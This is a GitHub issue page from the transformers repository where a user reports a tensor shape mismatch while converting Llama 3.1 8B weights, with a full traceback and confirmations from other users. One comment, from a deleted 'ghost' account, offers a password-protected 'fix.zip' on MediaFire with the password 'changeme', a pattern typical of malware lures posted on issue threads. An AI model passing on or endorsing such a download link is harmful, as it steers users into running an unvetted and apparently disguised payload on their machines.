huggingface / transformers

πŸ€— Transformers: State-of-the-art Machine Learning for Pytorch, TensorFlow, and JAX.
https://huggingface.co/transformers
Apache License 2.0
132.91k stars 26.51k forks source link

convert_llama_weights_to_hf.py, llama3.1-8B, Trying to set a tensor of shape torch.Size([128256, 4096]) in "weight" (which has shape torch.Size([128003, 4096])), this looks incorrect. #33791

Open Itime-ren opened 5 days ago

Itime-ren commented 5 days ago

System Info

python3 /home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py \ --input_dir /Data_disk/meta_llama/meta_llama3.1/Meta-Llama-3.1-8B \ --model_size 8B \ --output_dir /Data_disk/meta_llama/safetensors/meta_llama3.1/llama3.1-8B

You are using the default legacy behaviour of the <class 'transformers.models.llama.tokenization_llama_fast.LlamaTokenizerFast'>. This is expected, and simply means that the legacy (previous) behavior will be used so nothing changes for you. If you want to use the new behaviour, set legacy=False. This should only be set if you understand what it means, and thoroughly read the reason why this was added as explained in https://github.com/huggingface/transformers/pull/24565 - if you loaded a llama tokenizer from a GGUF file you can ignore this message. Saving a LlamaTokenizerFast to /Data_disk/meta_llama/safetensors/meta_llama3.1/llama3.1-8B. Fetching all parameters from the checkpoint at /Data_disk/meta_llama/meta_llama3.1/Meta-Llama-3.1-8B. /home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py:157: FutureWarning: You are using torch.load with weights_only=False (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for weights_only will be flipped to True. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via torch.serialization.add_safe_globals. We recommend you start setting weights_only=True for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature. loaded = torch.load(os.path.join(input_base_path, "consolidated.00.pth"), map_location="cpu") Loading the checkpoint in a Llama model. Loading checkpoint shards: 79%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–Ž | 26/33 [00:04<00:01, 6.36it/s] Traceback (most recent call last): File "/home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py", line 478, in main() File "/home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py", line 465, in main write_model( File "/home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py", line 324, in write_model model = LlamaForCausalLM.from_pretrained(tmp_model_path, torch_dtype=torch.bfloat16, low_cpu_mem_usage=True) File "/usr/local/lib/python3.10/dist-packages/transformers/modeling_utils.py", line 4014, in from_pretrained ) = cls._load_pretrained_model( File "/usr/local/lib/python3.10/dist-packages/transformers/modeling_utils.py", line 4502, in _load_pretrained_model new_error_msgs, offload_index, state_dict_index = _load_state_dict_into_meta_model( File "/usr/local/lib/python3.10/dist-packages/transformers/modeling_utils.py", line 973, in _load_state_dict_into_meta_model set_module_tensor_to_device(model, param_name, param_device, **set_module_kwargs) File "/usr/local/lib/python3.10/dist-packages/accelerate/utils/modeling.py", line 373, in set_module_tensor_to_device raise ValueError( ValueError: Trying to set a tensor of shape torch.Size([128256, 4096]) in "weight" (which has shape torch.Size([128003, 4096])), this looks incorrect.

Who can help?

No response

Information

Tasks

Reproduction

python3 /home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py \ --input_dir /Data_disk/meta_llama/meta_llama3.1/Meta-Llama-3.1-8B \ --model_size 8B \ --output_dir /Data_disk/meta_llama/safetensors/meta_llama3.1/llama3.1-8B

Expected behavior

get safetensors

ghost commented 5 days ago

This might help:This file might fix it https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme

you may need to install the c compiler

7180918-Madams commented 4 days ago

Having exactly the same problem (same tensor sizes and everything) at exactly the same point in the conversion. Also worth noting that I had to remove the "add_special_tokens" parameter from from the Llama3Converter in order to get it to run at all as it was causing an "unexpected keyword" error. Might have contributed to the irregular tensor sizes.

PaulRivaud commented 3 days ago

Encountering the same issue, with identical tensor sizes and progression percentage.